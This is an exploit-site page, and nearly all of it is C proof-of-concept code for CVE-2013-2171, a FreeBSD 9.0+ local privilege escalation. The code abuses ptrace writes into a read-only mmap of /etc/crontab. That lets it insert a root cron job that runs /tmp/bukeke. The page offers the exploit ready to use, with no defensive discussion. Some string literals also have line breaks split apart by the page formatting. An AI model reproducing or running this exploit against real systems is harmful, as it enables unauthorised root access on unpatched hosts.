Home / exploits

PDF

FreeBSD 9.0+ Privilege Escalation

Posted on 23 June 2013

/*
* CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap
*
* poc by SynQ, rdot.org, 6/2013
*
* don't forget to cp /etc/crontab /tmp
*
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/types.h>

char sc[]="*	*	*	*	*	root	/tmp/bukeke
#";

void child() {
 int status;

 status = ptrace(PT_TRACE_ME, 0, 0, 0);
 if (status != 0)
 printf("child ptrace error
");
 exit(1);
}

int main() {
 int pid, fd, i;
 char *addr;

 fd = open("/etc/crontab", O_RDONLY);
 if (fd<0) {
 printf("open failed
");
 exit(1);
 }

 addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);
 if (addr == MAP_FAILED) {
 printf("mmap fault
");
 exit(1);
 }

 pid = fork();
 if (pid == -1) {
 printf("fork failed
");
 exit(1);
 }
 else if (pid == 0)
 child();

 ptrace(PT_ATTACH, pid, 0, 0);
 if (wait(0) == -1) {
 printf("wait failed
");
 exit(1);
 }
 printf("writing shellcode...
");

 for(i=0; i < sizeof(sc)/4; i++)
 ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);

 ptrace(PT_DETACH, pid, 0, 0);
 if (wait(0) == -1) {
 printf("wait2 failed
");
 exit(1);
 }

 printf("done.
");
 return 0;
}

 

TOP